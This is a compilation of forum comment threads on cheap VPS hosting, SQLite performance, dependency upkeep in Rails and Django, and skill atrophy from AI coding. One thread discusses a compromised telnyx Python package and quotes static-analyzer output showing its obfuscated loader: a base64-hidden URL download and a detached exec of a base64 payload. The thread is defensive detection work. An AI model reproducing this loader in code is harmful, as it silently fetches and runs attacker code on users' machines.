
They inject backlinks and SEO spam to advertise payday loans, online pharmacies, casinos, and so on. Just imagine being able to get 30k links to your website at once. Google will rank that page very high.

One pharmacy shop that sells generics, or an unlicensed casino, can make tens of thousands of dollars per day. So even one week is enough to make a lot of money.


There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8GB of RAM. You can use it for caches or a database that supports concurrent writes. The $15 difference won't make any financial difference if you are trying to run a small business.

Thinking about how to fit everything onto a $5 VPS does not help your business.


$15 is not exactly zero, is it? If you don't need more than 1GB, why pay anything for more than 1GB?

I recall running LAMP stacks on something like 128MB about 20 years ago and not really having problems with memory. Most current website backends are not really much more complicated than they were back then if you don't haul in bloat.


It is. At $10k MRR it represents 0.15% of revenue. For a company selling web apps, having the whole backend cost that much is like it costing zero.

You probably don't make $10k MRR on day one. If you make many small apps, it can make sense to learn how to run things lean, to get a 4x longer runway per app.

The runway is going to be your time and attention span, not $10/mo.

I don't know what you value your time or opportunity cost at... but the $10/mo doesn't need to save very many minutes of your time, by deferring dealing with a resource constraint or adding a bit of reliability, to pay off.

If resource limitations end up upsetting one end user, that costs more than $10.


This assumes you have to spend any time or attention worrying. 1GB is plenty of memory for backend type stuff.

And most VPSs allow increasing memory with a click of a button and a reboot.


Overspending for the sake of overspending is not smart in life or business.

Saving 15 USD on 10k+ USD MRR is ridiculous.

Saving 15 USD on 0 USD MRR while still building the business is priceless. Virtually infinite runway.

Only if your time is worthless and someone else is paying your living expenses.

Given how much revenue depends on the experience of a web app and its loading times, I'd be happy to pay $100 a month on that revenue if I don't have to sacrifice a second of additional loading time, no matter how cleverly I optimized it.

That 1 second of loading time probably has more to do with heavy frontends and third-party scripts than with the backend server's capacity.

$100 is peanuts to most businesses, of course. But even so, I'd rather spend it on fixing an actual bottleneck.


Not all businesses depend on milliseconds being shaved off their loading times.

For example: Ticketmaster makes a ton of money and their site is complete dogshit.


There’s a happy medium and $5 for 1GB RAM just isn’t it.

Be sure to inform the author of the article, who is currently making money on his 1GB VPS, that he hasn't found a happy medium.

Not a very strong argument now, is it?

If the project already has positive revenue, then arguably the ability to capture new users is worth a lot, which requires acceptable performance even when a big traffic surge hits (like an HN hug of attention).

If the scaling is in the number of "zero cost" projects you start, then $5 vs. $15 is a 3x factor.


NVMe read latency is around 100 µs, and a SQLite database in the low terabytes needs somewhere between 3 and 5 random IOs per point lookup, so for an already meaningful amount of data you're talking worst case about 0.5 ms per cold lookup. Say your app is complex and makes 10 of these per request: 5 ms. That leaves you serving 200 requests/sec before ever needing any kind of cache.

That's 17 million hits per day at about 3.9 MiB/sec of sustained disk IO, before factoring in the parallelism that almost any bargain-bucket NVMe drive already offers (allowing you to at least 4x these numbers). But already you're talking about quadrupling the infrastructure spend before serving a single request, which is the entire point of the article.
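The arithmetic above can be sanity-checked with a quick back-of-envelope script. All inputs are the parent comment's assumed figures, not measurements; disk bandwidth then follows from IOs/sec multiplied by whatever SQLite page size you assume.

```python
# Back-of-envelope check of the figures above; all inputs are the
# parent comment's assumptions, not measurements.
NVME_READ_LATENCY_S = 100e-6   # ~100 us per cold random read
IOS_PER_LOOKUP = 5             # worst-case B-tree descent, low-terabyte SQLite DB
LOOKUPS_PER_REQUEST = 10       # "complex app" assumption

latency_per_request = NVME_READ_LATENCY_S * IOS_PER_LOOKUP * LOOKUPS_PER_REQUEST
requests_per_sec = 1 / latency_per_request        # fully serial, queue depth 1
hits_per_day = requests_per_sec * 86_400
ios_per_sec = requests_per_sec * IOS_PER_LOOKUP * LOOKUPS_PER_REQUEST

print(f"{latency_per_request * 1e3:.0f} ms/request")   # 5 ms
print(f"{requests_per_sec:.0f} requests/sec")          # 200
print(f"{hits_per_day / 1e6:.2f}M hits/day")           # 17.28M
print(f"{ios_per_sec:.0f} random IOs/sec")             # 10000
```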


You won't get such numbers on a $5 VPS; the SSDs used there are network-attached and shared between users.

Not quite $5, but on a $6.71 Hetzner VPS:

    # ioping -R /dev/sda

    --- /dev/sda (block device 38.1 GiB) ioping statistics ---
    22.7 k requests completed in 2.96 s, 88.8 MiB read, 7.68 k iops, 30.0 MiB/s
    generated 22.7 k requests in 3.00 s, 88.8 MiB, 7.58 k iops, 29.6 MiB/s
    min/avg/max/mdev = 72.2 us / 130.2 us / 2.53 ms / 75.6 us

Rereading this, I have no idea where 3.9 MiB/sec came from, that 200 requests/sec would be closer to 8 MiB/sec

> There are zero reasons to limit yourself to 1GB of RAM

There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, and instead to focus on generating business value for customers and getting more paying customers. I think it's something many engineers are keen to overlook in favor of fun technical details.


> There is a good reason: teaching yourself not to over-engineer, over-provision, or overthink, (...)

This is specious reasoning. You don't prevent anything by adding artificial constraints. To put things in perspective, Hetzner's cheapest vCPU plan comes with 4GB of RAM.


If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?

Why not a box with 128MB of RAM then?

Aside from the perfect solution fallacy, pragmatically it's because most operating systems require more than that to run. Debian's current recommended minimum is 512 MB, though they note that with swap enabled, as little as 350 MB is possible. If you wanted to run something more esoteric like Damn Small Linux, it's possible with as little as 64 MB last I checked.

In any case, this is for the OS itself - the webserver, application, database, etc. will all of course require their own. For a well-optimized program with a well-optimized schema, 1 GB is a reasonable lower bound.


Oh I'm well aware of the existence of operating systems that run in 32MB of RAM or less. So - why not? I think a well-optimised application server (especially one that uses SQLite as a datastore like the article proposes) can fit just fine in 128MB of RAM total, or 256MB if we're being generous. A whole gigabyte of memory seems rather extravagant, no? You could run half a dozen properly optimised apps on such a box.

> If I give you a box with 1 GiB of RAM, you are literally forced to either optimize your code to run in it, or accept the slowdown from paging. How is this specious?

It is specious reasoning. Self-imposed arbitrary constraints don't make you write good, performant code. At most they make your apps run slower, because they will needlessly hit your self-imposed arbitrary constraints.

If you put any value on performant code, you just write performance-oriented code, regardless of your constraints. It's silly to pile on absurd constraints and expect performance to be an outcome. It's like going to the gym, working out with a hand tied behind your back, and expecting this silly constraint to somehow improve the outcome of your workout. Complete nonsense.

And to drive the point home, this whole concern is even more perplexing as you are somehow targeting computational resources that fall below free tiers of some cloud providers. Sheer lunacy.


The gym analogy fails. Isolation exercises are almost exactly what you described. They target individual muscles to maximize hypertrophy, i.e. "improve the outcome of your workout."

Constraints provide feedback. Real-world example from my job: we have no real financial constraints for dev teams. If their poor schema or query design results in SLO breaches, and they opt to upsize their DB instead of spending the effort to fix the root problem, that is accepted. They have no incentive to do otherwise, because there are no constraints.

I think your analogy is flawed; a more apt one would be training with deliberately reduced oxygen levels, which trains your body to perform with fewer resources. Once you lift that constraint, you’ll perform better.

You’re correct that you can write performant code without being required to do so, but in practice, that is a rare trait.


I think we have to re-think and re-evaluate RAM usage on modern systems that use swapping with CPU-assisted page compression and fast, modern NVMe drives.

The MacBook Neo with 8GB of RAM is a showcase of how people underestimated its capabilities before launch due to the low amount of RAM, yet after release all the reviewers pointed to a larger set of capabilities, without any of the issues people predicted pre-launch.


$5 VPS disks are nowhere near MacBook ones; they are shared between users and often network-attached. They don't sit close to the CPU.

Memory compression sounds like going back to the DOS days. I think we're better off writing tighter, more performant code with YAGNI in mind. Alas, vibe coding will probably not get us there anytime soon.

Apple laptop CPUs have hardware memory compression and exceptionally high memory bandwidth for a CPU, and with their latest devices, very high storage bandwidth for a consumer SSD, so the equation is very different from the old DOS days.

Also, macOS is generally exceptional at caching and making efficient use of the fast solid state chips.

Or better yet, go with a euro provider like Hetzner and get 8GB of RAM for $10 or so. :)

Even their $5 plan gives 4GB.


I've been using Linode for years, and just yesterday I went to use Hetzner for a new VPS and they wanted my home address and passport. No thanks.

They also have servers in the US (east and west coast).

I don't think they offer their cheapest options (CX*) outside of Germany/Finland though. Singapore and USA are a bit pricier.

The reason would be YAGNI. Apparently 1GB doesn’t constitute an actual limit for OP’s use case. I’m sure he’ll upgrade if and when the need arises.

Hetzner, OVH and others offer 4-8GB and 2-4 cores for the same ~$5.

While I agree that the $15 difference won’t make any financial difference, I look at the numbers from another angle. The main idea here, as per my understanding, is to reduce the hosting cost as much as possible.

It doesn't look like they thought about how to make it fit, though. They just used a known-good Go template.

Where can you get 8GB for $20?

> There are zero reasons to limit yourself to 1GB of RAM. By paying $20 instead of $5 you can get at least 8gb of RAM.

In my head, I call this the 'doubling algorithm'.

If there's anything that's both relatively cheap and useful, but where "more" (either in quality or quantity) has additional utility, 2x it.

Then 2x it again.

Repeat until either: the price change becomes noticeable or utility stops being gained.

Tl;dr: saving on the order of single dollars is rarely worth the tradeoffs.
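The heuristic above can be sketched as a toy function. Everything here (the price model, the utility function, the pain threshold) is made up for illustration:

```python
def doubling(amount, price_of, utility_of, budget_pain_threshold):
    """Keep doubling a resource while the price stays tolerable
    and each doubling still adds utility. All inputs are hypothetical."""
    while True:
        nxt = amount * 2
        if price_of(nxt) > budget_pain_threshold:
            break  # price change became noticeable
        if utility_of(nxt) <= utility_of(amount):
            break  # utility stopped being gained
        amount = nxt
    return amount

# Toy example: RAM in GB, $2.50/GB, utility plateaus at 16 GB.
ram = doubling(
    1,
    price_of=lambda gb: gb * 2.5,
    utility_of=lambda gb: min(gb, 16),
    budget_pain_threshold=50,
)
print(ram)  # stops at 16
```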


> "There are zero reasons to limit yourself to 1GB of RAM"

> Immediately proposes alternative which is literally 4x the cost.


What are you using that utilizes Apple containers?


They did not even try to hide the payload that much.

Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.

  hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip  --min-confidence high  --exclude HX4000

  warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
  86:13
       │
  7783 │         except:
  7784 │             pass
  7785 │
  7786 │         r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
       │             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
  7787 │         with urllib.request.urlopen(r, timeout=15) as d:
  7788 │             with open(t, "wb") as f:
  7789 │                 f.write(d.read())
       │
       = Confidence: High
         Help: Data exfiltration is the unauthorized transfer of data from a computer.


  warning[HX4010]: Execution of obfuscated code.
       ┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
  10:9
       │
  7807 │       if os.name == 'nt':
  7808 │           return
  7809 │       try:
  7810 │ ╭         subprocess.Popen(
  7811 │ │             [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
  7812 │ │             stdout=subprocess.DEVNULL,
  7813 │ │             stderr=subprocess.DEVNULL,
  7814 │ │             start_new_session=True
  7815 │ │         )
       │ ╰─────────^ HX4010
  7816 │       except:
  7817 │           pass
  7818 │
       │
       = Confidence: VeryHigh
         Help: Obfuscated code exec can be used to bypass detection.
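A "basic checker" of the kind described above can be a one-line regex. A minimal sketch (the pattern and the sample snippet are illustrative, not hexora's actual rules):

```python
import re

# Flag the classic obfuscated-exec pattern in source text.
SUSPICIOUS = re.compile(r"exec\s*\(\s*base64\.b64decode")

sample = (
    'subprocess.Popen([sys.executable, "-c", '
    '"import base64; exec(base64.b64decode(\'...\').decode())"])'
)

if SUSPICIOUS.search(sample):
    print("flagged: obfuscated exec via base64")
```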


Are there more tools like hexora?


GuardDog, but it's based on regexes


jq is very convenient, even if your files are more than 100GB. I often need to extract one field from huge JSON Lines files; I just pipe them through jq to get results. It's slower, but implementing proper data processing would take more time.
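The hand-rolled alternative mentioned here can be sketched as a streaming extractor in Python; it reads one line at a time, so memory stays constant regardless of file size (the field name is hypothetical):

```python
import json

# Stream a JSON Lines source and yield one field per record.
def extract_field(lines, field):
    for line in lines:
        if line.strip():
            record = json.loads(line)
            if field in record:
                yield record[field]

# Works the same on an open file object:
#   with open("huge.jsonl") as f:
#       for value in extract_field(f, "user_id"):
#           print(value)
sample = ['{"user_id": 1, "x": "a"}', '{"user_id": 2}', '{"other": 3}']
print(list(extract_field(sample, "user_id")))  # [1, 2]
```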


More than 100GB can be 101GB, 500GB or 1TB+. I was speaking about 1TB+ files. I'm not sure you can get it faster unless you have a parallel processor.


Their previous release would be easily caught by static analysis. PTH is a novel technique.

Run all your new dependencies through static analysis and don't install the latest versions.

I implemented a static analyzer for Python that detects close to 90% of such injections.

https://github.com/rushter/hexora


Interesting tool, I will definitely try it. Just curious: is there a tool (a hexora checker) that ensures hexora itself and its dependencies are not compromised? And of course, if there is one, I'll need another one for the hexora checker...


There is no such tool, but you can use other static analyzers. Datadog also has one, but it's not AST-based.



And it's easily bypassed by an attacker who knows about your static analysis tool and can iterate on their exploit until it no longer gets flagged.


The main things are:

1. Pin dependencies with SHA signatures.

2. Mirror your dependencies.

3. Only update when truly necessary.

4. At first, run everything in a sandbox.
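Step 1 amounts to refusing to install anything whose bytes don't match a pinned hash, which is the same check pip performs with `--require-hashes`. A minimal sketch (filenames and hashes are made up):

```python
import hashlib

# Pinned sha256 digests for known-good artifacts (values are made up).
PINNED = {
    "example-1.0.tar.gz": hashlib.sha256(b"trusted release bytes").hexdigest(),
}

def verify(filename, data):
    """Raise if the downloaded artifact doesn't match its pinned hash."""
    expected = PINNED.get(filename)
    actual = hashlib.sha256(data).hexdigest()
    if expected is None or actual != expected:
        raise RuntimeError(f"hash mismatch for {filename}: refusing to install")
    return True

print(verify("example-1.0.tar.gz", b"trusted release bytes"))  # True
# verify("example-1.0.tar.gz", b"tampered bytes") would raise RuntimeError
```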


They actually did not add LinkedIn specifically. It's an AI translator that accepts anything in the `to` field.

https://translate.kagi.com/?from=en&to=Crypto%20Scammer&text...


So I've seen. It's just the LinkedIn one is what they advertised. Speaks to the fact that it's probably some slopcoded thing, which I'd usually get mildly upset about but who can muster the effort in this economy. I think the point still stands though.


Why is this upvoted? The author did not even bother to read what he wrote.

> SOC 2 Type II ready

Huh? You vibecoded the repo in a week and claim it's ready?


I meant that since this is designed to be deployed in a company's private VPC, their data stays with them. Zero vendor data risk. Corrected it. Thanks for pointing it out.


> I still understand how everything works,

That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I noticed that my skills had gotten way worse. I became way slower. You have to constantly exercise your brain.

This reminds me of people who watch tens of video courses about programming, but can't code anything when it comes to a real job. They have an illusion of understanding how to code.

For AI companies, that's a good thing. People's skills can atrophy to the point that they can't code without LLMs.

I would suggest practicing it from time to time. It helps with code review and keeping the codebase at a decent level. We just can't afford to vibecode important software.

LLMs produce average code, and when you see it all day long, you get used to it. After getting used to it, you start to merge bad code because suddenly it looks good to you.


The GP seems to run a decentralized AI hosting company built on top of a crypto chain.

Can you get any faddier than that? Of course they love AI.


I have a hard time using languages I know without an LSP when all I've been doing is using the LSP and its suggestions.

I can't imagine how it is for people that try to write manually after years of heavy LLM usage.


I disagree. I used to do a lot of math years ago. If you gave me some problems to do now, I probably wouldn't be able to recall exactly how to solve them. But if you give me a written solution, I will still be able to confirm with 100% confidence that it is correct.

This is what it means to understand something. It's like P vs. NP: I don't need to find the solution, I just need to be able to verify _a_ solution.


Well, I'm still using my brain from morning to evening, but I'm certainly using it differently.

This will without a doubt become a problem if the whole AI thing somehow collapses or becomes very expensive!

But it’s probably the correct adaptation if not.


> That's partly an illusion. Try doing everything manually. After only using inline suggestions for six months a few years ago, I've noticed that my skills have gotten way worse. I became way slower. You have to constantly exercise your brain.

YMMV, but I'm not seeing this at all. You might get foggy around things like the particular syntax for some advanced features, but I'll never forget what a for loop is, how binary search works, or how to analyze time complexity. That's just not how human cognition works, assuming you had solid understanding before.

I still do puzzles like Advent of Code or competitive programming problems from time to time because I don't want to "lose it," but even if you're doing something interesting, a lot of practical programming boils down to the digital equivalent of filing paperwork: mind-numbingly boring, forgettable code that still has to be written to a reasonable standard of quality, because otherwise everything collapses.


Want to try doing anything more complicated? I have seen a lot of delusional people around who think their skills are still at the same level, but in interviews they bomb even simple technical topics where practical implementation is concerned.

If you don't code, of course you won't be as good at coding; that's a practical fact. Sure, beyond a certain skill level your decline may not be noticeable early on, because of the years of built-up practice and knowledge.

But considering that every year there is so much more interesting technology, if you don't keep improving through hands-on learning and don't slow down to take stock, you won't be capable of anything more than delusional thinking about how awesome your skill level is.


I love the batteries that RoR or Django gives you, but then I also remember how much time it takes to maintain old projects. Updating a project that was started 5-6 years ago takes a lot of time. Part of that is managing dependencies. For Django, they can easily go above 100. Some of them have to be compiled with specific versions of system libraries. Even Docker does not save you from a lot of problems.

Right now, I would rather use Go with a simple framework, or even without one. With Go, it's so easy just to copy the binary over.


I'm working on a large (at least 300k+ loc) Django code base right now and we have 32 direct dependencies. Mostly stuff like lxml, pillow and pandas. It's very easy to use all the nice Django libs out there but you don't have to.


I was talking about total deps, not direct. By installing something like Celery, you get 8-10 extra dependencies that, in turn, can also have extra deps. And yeah, extra deps can conflict with each other as well.


I find the thought daunting but the reality surprisingly easy.

You just keep up as you go, as long as you keep things close to the framework it's fine.


> You just keep up as you go

He said "Updating a project that was started 5-6 years ago takes a lot of time."


Yes but GP said "In reality it's not that much".


Not much work every few months turns into a lot over years, especially if you skip a few of those "every few months" events.


I'm confused. It's too much work to upgrade dependencies, but not too much time to write from scratch and maintain, in perpetuity, original code?


Yes. I've probably spent more time maintaining a trivial Rails app originally written in 2007 than I spent writing it in the first place.


But if you would have rewritten the entire app every time you needed to update the dependencies, that would have taken even more time.


That is obviously true but doesn't mean as much as you seem to think. Washing laundry is also not much work but it adds up to a lot over the years, especially if you skip a few weeks of laundry every once in a while. That is not an excuse to not do it.

The answer is the same in both cases: acquire some discipline and treat maintenance with the respect it deserves.


It is easy, and people tend to do what is easy. It takes more effort to minimise dependencies. Your boss or your client will not even notice.

Obviously there are some dependencies that you cannot easily avoid (like the things you mention). On the other hand, there is a lot of stuff in use that is not that hard to avoid; things like wrappers for REST APIs are often not really necessary.


Sometimes I think the issue here is churn. Security fixes aside, what is it that updated dependencies really give? Can't some of these projects just... stop?


The issue is that the longer you wait to upgrade dependencies, the more pronounced the upgrade problems become, generally speaking, because more incompatibilities accumulate. If those 5-6 year old projects had been updated every now and then, the pain of updating them would be far less. As you point out, security is an aspect too: you can leave the project inactive, but then you might hit that problem.


Dependency hell. Usually how it goes: you have to develop a new feature, and you find a library or a newer version of the framework that solves the problem, but it depends on a version of another library that is incompatible with the one in your project. You update the conflicting dependency and get 3 new conflicts; when you fix those, you get 5 new conflicts, and so on.


So churn causes more churn.

Also breaking APIs should be regarded very poorly. It isn’t. But it should be.


I agree, but let's say you are looking for a library to solve your problem. You see one repo updated 2 weeks ago and another updated 5 years ago; which one do you choose?


That depends. What problem do I have, exactly?

Do I need a library to sort an array? The 5 years ago option is going to be the more likely choice. A library updated 2 weeks ago is highly suspicious.

Do I need a library to provide timezone information? The 2 weeks ago option, unquestionably. The 5 years ago option will now be woefully out of date.


Perhaps some kind of ‘this code is still alive’ flag is key. Even just updating the project. Watching issues. Anything showing ‘active but done’.


The real issue with Rails apps is keeping up with the framework and language versions. There are really two categories of dependencies.

One-off libraries that don't have a runtime dependency on Rails are typically very low-maintenance. You can mostly leave them alone (even a security vulnerability is unlikely to be exploitable for how you're using one of these, as often user input isn't even getting through to them). For instance a gem you install to communicate with the stripe API is not typically going to break when you upgrade Rails. Or adding httparty to make some API requests to other services.

Then there are libraries that are really framework extensions, like devise for authentication or rspec for testing. These are tightly coupled to Rails, sometimes to its private internals, and you get all sorts of nasty compatibility issues when the framework changes. You have to upgrade Rails itself because you really do need to care about security support at that level, even for a relatively small company, so you can end up in a situation where leaving these other dependencies to fester makes upgrading Rails very hard.

(I run a startup that's a software-enabled service to upgrade old Rails apps).


I think you could only get around this by forcing your whole dependency chain to only add non-breaking security fixes (or backport them for all versions in existence). Otherwise small changes will propagate upwards and snowball into major updates.


Indeed, that's what a lot of Elixir and Erlang packages do: if it's done, then it's done.


"Security fixes aside" is too dismissive. Transitive dependencies with real CVEs can feel like the tail wagging the dog, but ignore them at your peril.


I have not had this experience as badly with Laravel. Their libraries seem much more stable to me. We've gone up 5 major versions of Laravel over the last year and a half and it was pretty simple for each major version.


Laravel is extremely stable and consistent.


I have plenty of RoR apps in production with millions of users. We upgrade the projects yearly and it's fine, not as catastrophic as it sounds; even easier with Opus now.


Does batteries included somehow result in upgrading years old projects being a larger lift? I would think the opposite.


My experience has been the opposite, especially since Rails has included more batteries over the years. You need fewer non-Rails-default dependencies than ever, and the upgrade process has gotten easier every major version.


Rails is way more stable and mature these days. Keeping up to date is definitely easier. Probably 10x easier than a Node/JS project which will have far more churn.


I also think it's the opposite, since the dependencies are almost guaranteed to be compatible with each other. And I think Ruby libraries in particular are usually quite stable and maintained for a long time.


My medium-sized Django projects had close to 100 dependencies, and when you want to update to a new Django version, the majority of them must be updated too.

Thankfully, updating to a new Django version is usually simple. It does not require many code changes.

But finding small bugs after an update is hard, unless you have very good test coverage. New versions of middleware/Django plugins often behave slightly differently, and it's hard to keep track of all the changes when you have so many dependencies.


It really depends how they were built. I have large Django apps running for a very long time that require minimal maintenance, but it’s because we were very deliberate about dependencies.

But I learned to do that by working on codebases that were the opposite.


Different experience with Django here. I am only using a handful of deps; dj-database-url, dj-static, gunicorn, and psycopg are the only "mandatory" or conserved ones, IMO, as a baseline.


Use uv for dep management. Make sure you have tests.

In the past month I migrated a 20-year-old Python project (2.6, using the Pylons library) to modern Python in 2 days. It runs 40-80 times faster too.


It used to take at least a day of work. In a post-2025/11 world, it is under an hour. Maybe even 15 minutes if you've landed on a high quality LLM session.


Complete opposite of my experience


In my experience, the magic makes the easy parts easier and the hard parts harder

